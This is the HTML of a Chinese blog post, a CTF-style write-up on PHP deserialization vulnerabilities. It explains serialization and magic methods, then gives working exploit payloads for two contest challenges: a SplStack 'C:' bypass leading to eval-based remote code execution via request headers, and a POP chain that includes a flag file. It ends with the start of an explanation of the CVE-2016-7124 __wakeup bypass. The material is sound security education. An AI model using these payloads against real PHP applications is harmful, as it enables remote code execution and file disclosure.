

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="pikaball">
  <meta name="keywords" content="">
  
    <meta name="description" content="前置知识序列化与反序列化所谓序列化是将一个对象（标量、数组或自定义类）转化为统一的字符串形式，反序列化函数接收这个字符串可以还原出这个对象。 序列化的内容只是对象的成员变量的值，不能做到把类内方法也打包，换句话说，序列化是存储一个已经定义的类的实例，而不是类本身。做反序列化操作时要求这个类必须已经有定义，然后反序列化函数将把成员变量的值填充到类的一个实例并返回这个实例。 一个简单的例子： &lt;">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化漏洞整理">
<meta property="og:url" content="http://pikaball.cc/2023/07/18/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/index.html">
<meta property="og:site_name" content="pikaball&#39;s blog">
<meta property="og:description" content="前置知识序列化与反序列化所谓序列化是将一个对象（标量、数组或自定义类）转化为统一的字符串形式，反序列化函数接收这个字符串可以还原出这个对象。 序列化的内容只是对象的成员变量的值，不能做到把类内方法也打包，换句话说，序列化是存储一个已经定义的类的实例，而不是类本身。做反序列化操作时要求这个类必须已经有定义，然后反序列化函数将把成员变量的值填充到类的一个实例并返回这个实例。 一个简单的例子： &lt;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2023/06/13/d6a2f81e89c9b1f3.jpg">
<meta property="article:published_time" content="2023-07-18T10:37:40.000Z">
<meta property="article:modified_time" content="2023-07-26T14:35:57.909Z">
<meta property="article:author" content="pikaball">
<meta property="article:tag" content="PHP">
<meta property="article:tag" content="反序列化">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s3.bmp.ovh/imgs/2023/06/13/d6a2f81e89c9b1f3.jpg">
  
  
  
  <title>PHP反序列化漏洞整理 - pikaball&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"pikaball.cc","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>pikaball</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PHP反序列化漏洞整理"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-18 18:37" pubdate>
          2023年7月18日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          59 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">PHP反序列化漏洞整理</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h2><p>所谓序列化是将一个对象（标量、数组或自定义类）转化为统一的字符串形式，反序列化函数接收这个字符串可以还原出这个对象。</p>
<p>序列化的内容只是对象的成员变量的值，不能做到把类内方法也打包，换句话说，序列化是存储一个已经定义的类的实例，而不是类本身。做反序列化操作时要求这个类必须已经有定义，然后反序列化函数将把成员变量的值填充到类的一个实例并返回这个实例。</p>
<p>一个简单的例子：</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pika</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$var</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$q</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">show</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;pika_&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">var</span>;
    &#125;
&#125;

<span class="hljs-comment"># 建立一个对象并序列化</span>
<span class="hljs-variable">$p</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">pika</span>();
<span class="hljs-variable">$p</span>-&gt;<span class="hljs-keyword">var</span> = <span class="hljs-string">&quot;111&quot;</span>;
<span class="hljs-variable">$p</span>-&gt;q = <span class="hljs-number">0</span>;
<span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$p</span>);

<span class="hljs-comment"># O:4:&quot;pika&quot;:2:&#123;s:3:&quot;var&quot;;s:3:&quot;111&quot;;s:1:&quot;q&quot;;i:0;&#125;</span></code></pre></div>

<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pika</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$var</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$q</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">show</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;pika_&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">var</span>;
    &#125;
&#125;

<span class="hljs-comment"># 反序列化恢复上面的对象</span>
<span class="hljs-variable">$p</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-string">&#x27;O:4:&quot;pika&quot;:2:&#123;s:3:&quot;var&quot;;s:3:&quot;111&quot;;s:1:&quot;q&quot;;i:0;&#125;&#x27;</span>);

<span class="hljs-variable">$p</span>-&gt;<span class="hljs-title function_ invoke__">show</span>();

<span class="hljs-comment"># pika_111</span></code></pre></div>

<p>开头的<code>O:</code>标记声明一个对象，还有别的标记比如<code>a:</code>声明一个数组，<code>S:</code>声明一个字符串等等。</p>
<h2 id="魔法函数"><a href="#魔法函数" class="headerlink" title="魔法函数"></a>魔法函数</h2><p>魔法函数是类内的特殊方法，在满足特定条件时自动触发而不需要主动调用，看一个例子：</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pika</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$var</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$q</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Magic function is triggered.&quot;</span>;
        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;pika!&quot;</span>;
    &#125;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">show</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;pika_&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">var</span>;
    &#125;
&#125;

<span class="hljs-variable">$p</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-string">&#x27;O:4:&quot;pika&quot;:2:&#123;s:3:&quot;var&quot;;s:3:&quot;111&quot;;s:1:&quot;q&quot;;i:0;&#125;&#x27;</span>);

<span class="hljs-variable">$t</span> = <span class="hljs-variable">$p</span>.<span class="hljs-string">&quot;123&quot;</span>;

<span class="hljs-comment"># Magic function is triggered.</span></code></pre></div>
<p>上面的代码试图将pika类型对象p作为字符串与”123”拼接赋值给t，__toString()方法自动触发（此时t的值应当为”pika!123”）。</p>
<p>常见魔法函数：</p>
<table>
<thead>
<tr>
<th>魔法函数</th>
<th>触发条件</th>
</tr>
</thead>
<tbody><tr>
<td>__sleep()</td>
<td>进行序列化时首先触发</td>
</tr>
<tr>
<td>__wakeup()</td>
<td>进行反序列化时首先触发</td>
</tr>
<tr>
<td>__toString()</td>
<td>对象被当成字符串调用时触发</td>
</tr>
<tr>
<td>__invoke()</td>
<td>对象被当成函数调用时触发</td>
</tr>
<tr>
<td>__construct()</td>
<td>构造函数，new一个对象时触发，反序列化不会触发</td>
</tr>
<tr>
<td>__destruct()</td>
<td>析构函数，对象销毁时触发。代码正常执行结束会自动销毁对象，或者可以将对象重新赋值为其他类型完成主动销毁</td>
</tr>
<tr>
<td>__call()</td>
<td>调用对象的不存在或不可访问的方法时触发</td>
</tr>
<tr>
<td>__callStatic()</td>
<td>与__call()类似，调用不存在或不可访问的静态方法时触发</td>
</tr>
<tr>
<td>__get()</td>
<td>调用不存在或不可访问的成员变量时触发</td>
</tr>
<tr>
<td>__set()</td>
<td>写入不存在或不可访问的成员变量时触发</td>
</tr>
<tr>
<td>__isset()</td>
<td>对不存在或不可访问属性调用isset()或empty()时触发</td>
</tr>
<tr>
<td>__unset()</td>
<td>对不存在或不可访问属性调用unset()时触发</td>
</tr>
</tbody></table>
<h2 id="2023SYCTF-4号的罗纳尔多"><a href="#2023SYCTF-4号的罗纳尔多" class="headerlink" title="2023SYCTF 4号的罗纳尔多"></a>2023SYCTF 4号的罗纳尔多</h2><p>当时没做出来，以下内容参考了这篇wp：<a target="_blank" rel="noopener" href="https://www.yuque.com/dat0u/ctf/teqv90hnmr4yoo3e">https://www.yuque.com/dat0u/ctf/teqv90hnmr4yoo3e</a></p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);
<span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">evil</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$cmd</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-keyword">if</span>(<span class="hljs-string">&#x27;VanZZZZY&#x27;</span> === <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/;+/&#x27;</span>,<span class="hljs-string">&#x27;VanZZZZY&#x27;</span>,<span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/[A-Za-z_\(\)]+/&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-variable">$this</span>-&gt;cmd)))&#123;
            <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;cmd.<span class="hljs-string">&#x27;givemegirlfriend!&#x27;</span>);
        &#125; <span class="hljs-keyword">else</span> &#123;
            <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;nonono&#x27;</span>;
        &#125;
    &#125;
&#125;

<span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^[Oa]:[\d]+|Array|Iterator|Object|List/i&#x27;</span>,<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;Pochy&#x27;</span>]))&#123;
    <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;Pochy&#x27;</span>]);
&#125; <span class="hljs-keyword">else</span> &#123;
    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;nonono&#x27;</span>;
&#125;</code></pre></div>
<p>分析源码，思路显然是要反序列化evil类触发__destruct方法，并且绕过两个正则过滤执行eval进行RCE。</p>
<ul>
<li><code>__destruct</code>函数内部的正则过滤要求<code>$cmd</code>只能包含字母下划线和圆括号，需要使用无参RCE。</li>
<li>执行eval时在<code>$cmd</code>后拼接了一个无意义字符串，需要使用<code>__halt_compiler();</code>掐掉执行过程防止报错。</li>
<li>对序列化字符串过滤了<code>O:</code>和<code>a:</code>开头后跟数字，以及几个特定单词。正常进行一个对象的序列化是O开头，数组是a，这里都不能用，需要用C绕过。</li>
</ul>
<h3 id="Trick-Serializable接口与C标识"><a href="#Trick-Serializable接口与C标识" class="headerlink" title="Trick: Serializable接口与C标识"></a>Trick: Serializable接口与C标识</h3><p>关于Serializable接口：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/class.serializable.php">php手册</a></p>
<p>C:是一个特殊的标识，只有已经实现了Serializable接口的类才能产生C开头的序列化字符串。</p>
<p>这里我们需要使用符合上述条件的PHP内置类，如SplStack.</p>
<p>exp（环境是php7.0）:</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">evil</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$cmd</span>=<span class="hljs-string">&quot;eval(end(getallheaders()));__halt_compiler();&quot;</span>;
&#125;

<span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-built_in">SplStack</span>();
<span class="hljs-variable">$a</span>-&gt;<span class="hljs-title function_ invoke__">push</span>(<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">evil</span>());
<span class="hljs-variable">$b</span>=<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);
<span class="hljs-keyword">echo</span>(<span class="hljs-variable">$b</span>);</code></pre></div>

<p>payload: </p>
<div class="code-wrapper"><pre><code class="hljs text">?Pochy=C:8:&quot;SplStack&quot;:83:&#123;i:6;:O:4:&quot;evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:45:&quot;eval(end(getallheaders()));__halt_compiler();&quot;;&#125;&#125;</code></pre></div>

<h1 id="POP链"><a href="#POP链" class="headerlink" title="POP链"></a>POP链</h1><p>简而言之就是通过构造特殊的序列化字符串，把魔法函数串起来调用。</p>
<h2 id="2023陕西省赛-ezpop"><a href="#2023陕西省赛-ezpop" class="headerlink" title="2023陕西省赛 ezpop"></a>2023陕西省赛 ezpop</h2><div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">night</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$night</span>;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;night . <span class="hljs-string">&#x27;哒咩哟&#x27;</span>;
    &#125;
&#125;

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">day</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$day</span>;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;day-&gt;<span class="hljs-title function_ invoke__">go</span>();
    &#125;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>)</span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;day-&gt;<span class="hljs-title function_ invoke__">getFlag</span>();
    &#125;
&#125;


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">light</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$light</span>;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;light-&gt;<span class="hljs-title function_ invoke__">d</span>();
    &#125;
&#125;

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">dark</span></span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$dark</span>;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">go</span>(<span class="hljs-params"></span>)</span>&#123;
        (<span class="hljs-variable language_">$this</span>-&gt;dark)();
    &#125;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFlag</span>(<span class="hljs-params"></span>)</span>&#123;
        <span class="hljs-keyword">include</span>(<span class="hljs-title function_ invoke__">hacked</span>(<span class="hljs-variable">$this</span>-&gt;dark));
    &#125;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">hacked</span>(<span class="hljs-params"><span class="hljs-variable">$s</span></span>) </span>&#123;
    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$s</span>, <span class="hljs-number">0</span>,<span class="hljs-number">1</span>) == <span class="hljs-string">&#x27;/&#x27;</span>)&#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;呆jio步&#x27;</span>);
    &#125;
    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/\.\.*/&#x27;</span>, <span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-variable">$s</span>);
    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$s</span>);
    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">htmlentities</span>(<span class="hljs-variable">$s</span>, ENT_QUOTES, <span class="hljs-string">&#x27;UTF-8&#x27;</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">strip_tags</span>(<span class="hljs-variable">$s</span>);
&#125;

<span class="hljs-variable">$un</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;‮⁦快给我传参⁩⁦pop&#x27;</span>]); <span class="hljs-comment">//</span>
<span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Exception</span>(<span class="hljs-string">&#x27;seino&#x27;</span>);</code></pre></div>

<p>这题有个恶心的地方就是post参数名包含特殊控制字符，看起来名字是pop，实际上长这样：<br><img src="https://s3.bmp.ovh/imgs/2023/06/13/d6a2f81e89c9b1f3.jpg" srcset="/img/loading.gif" lazyload></p>
<p>先不管这个，来分析一下pop链怎么构造，先找头和尾：</p>
<ul>
<li>最终目的是执行dark类的getFlag()方法，include(“\flag”)，那个hacked函数过滤拿url编码绕一下就行，毫无障碍。</li>
<li>代码只做了一个unserialize，又没有__wakeup()，入口只能是night类的__destruct()方法，在对象销毁时调用。</li>
</ul>
<p>之后就是顺藤摸瓜，比如要调用dark类的getFlag()，发现在day类的__call方法里出现getFlag()，那就把day类对象的成员变量$day赋值为一个dark类。然后再去找哪里可以触发__call()，从下往上一路摸到night类的__destruct里面就完事了。</p>
<p>pop链构造：</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">night</span>();
<span class="hljs-variable">$a</span>-&gt;night = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">day</span>();
<span class="hljs-variable">$a</span>-&gt;night-&gt;day = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">dark</span>();
<span class="hljs-variable">$a</span>-&gt;night-&gt;day-&gt;dark = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">light</span>();
<span class="hljs-variable">$a</span>-&gt;night-&gt;day-&gt;dark-&gt;light = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">day</span>();
<span class="hljs-variable">$a</span>-&gt;night-&gt;day-&gt;dark-&gt;light-&gt;day = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">dark</span>();
<span class="hljs-variable">$a</span>-&gt;night-&gt;day-&gt;dark-&gt;light-&gt;day-&gt;dark = <span class="hljs-string">&quot;%2Fflag&quot;</span>;

<span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);
<span class="hljs-keyword">echo</span> <span class="hljs-variable">$s</span>;</code></pre></div>

<p>这样$a是一个night类，当触发$a的__destruct方法，执行echo语句时$this-&gt;night被作为字符串调用，然而$a的$night属性被我们构造成了一个day类，这样就又会触发day类的__toString方法，以此类推。</p>
<h3 id="Trick-利用数组主动销毁对象"><a href="#Trick-利用数组主动销毁对象" class="headerlink" title="Trick: 利用数组主动销毁对象"></a>Trick: 利用数组主动销毁对象</h3><p>至此pop链是没问题了，但是实际上这样传进去__destruct方法还不会触发，因为末尾抛出了一个异常导致没法执行正常的对象销毁流程，我们需要手动销毁，利用数组：</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">array</span>(<span class="hljs-variable">$a</span>,<span class="hljs-literal">null</span>));
<span class="hljs-keyword">echo</span> <span class="hljs-variable">$s</span>;
<span class="hljs-comment"># a:2:&#123;i:0;O:5:&quot;night&quot;:1:&#123;s:5:&quot;night&quot;;O:3:&quot;day&quot;:1:&#123;s:3:&quot;day&quot;;O:4:&quot;dark&quot;:1:&#123;s:4:&quot;dark&quot;;O:5:&quot;light&quot;:1:&#123;s:5:&quot;light&quot;;O:3:&quot;day&quot;:1:&#123;s:3:&quot;day&quot;;O:4:&quot;dark&quot;:1:&#123;s:4:&quot;dark&quot;;s:7:&quot;%2Fflag&quot;;&#125;&#125;&#125;&#125;&#125;&#125;i:1;N;&#125;</span></code></pre></div>
<p>拿到上面的输出，手动把数组第二项null的索引<code>i:1</code>改成<code>i:0</code>:</p>
<p><code>a:2:&#123;i:0;O:5:&quot;night&quot;:1:&#123;s:5:&quot;night&quot;;O:3:&quot;day&quot;:1:&#123;s:3:&quot;day&quot;;O:4:&quot;dark&quot;:1:&#123;s:4:&quot;dark&quot;;O:5:&quot;light&quot;:1:&#123;s:5:&quot;light&quot;;O:3:&quot;day&quot;:1:&#123;s:3:&quot;day&quot;;O:4:&quot;dark&quot;:1:&#123;s:4:&quot;dark&quot;;s:7:&quot;%2Fflag&quot;;&#125;&#125;&#125;&#125;&#125;&#125;i:0;N;&#125;</code></p>
<p>这样在反序列化执行的时候，把索引为0的数组元素覆盖成了null，完成主动销毁。</p>
<h1 id="CVE-2016-7124漏洞"><a href="#CVE-2016-7124漏洞" class="headerlink" title="CVE-2016-7124漏洞"></a>CVE-2016-7124漏洞</h1><p><a target="_blank" rel="noopener" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7124">CVE-2016-7124</a>可以绕过反序列化时__wakeup()方法的执行，此漏洞有效的php版本：PHP before 5.6.25 and 7.x before 7.0.10</p>
<p>具体利用方法：当反序列化字符串O:标记后跟的属性个数大于实际个数，则会跳过__wakeup()。</p>
<p>测试发现php5和php7的表现不一样，下面做简单展示。</p>
<p>写一个测试脚本:</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pika</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$var</span> = <span class="hljs-string">&quot;00&quot;</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$q</span> = <span class="hljs-string">&quot;qw&quot;</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;wakeup! &quot;</span>;
    &#125;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>
<span class="hljs-function">    </span>&#123;
